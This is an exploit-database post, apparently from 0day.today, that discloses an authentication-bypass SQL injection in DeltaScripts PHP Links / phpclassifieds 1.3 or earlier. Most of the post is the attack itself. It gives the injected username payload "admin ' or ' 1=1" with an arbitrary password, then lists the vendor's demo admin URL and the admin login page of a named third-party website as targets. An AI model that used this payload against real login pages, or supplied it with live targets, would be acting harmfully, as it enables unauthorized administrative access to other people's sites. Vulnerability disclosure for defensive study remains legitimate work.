[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DeltaScripts PHP Links <= 1.3 (Auth Bypass) SQL Injection Vuln

Author
ZoRLu
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4099
Category
web applications
Date add
06-11-2008
Platform
unsorted
==============================================================
DeltaScripts PHP Links <= 1.3 (Auth Bypass) SQL Injection Vuln
==============================================================


[~] deltascripts phpclassifieds Remote Auth Bypass Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 06.11.2008
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] -----------------------------------------------------------

Exploit:

username: [real_admin_name] ' or ' 1=1

password: ZoRLu

note: generally admin name: admin 



admin login for demo:

http://demo.deltascripts.com/classifieds/admin/login.php


example for demo:

admin: admin ' or ' 1=1

passwd: ZoRLu



example 2:

admin login: 

http://www.maramuresul-istoric.ro/anunturi/admin/login.php



admin: admin ' or ' 1=1

passwd: ZoRLu



#  0day.today [2024-11-16]  #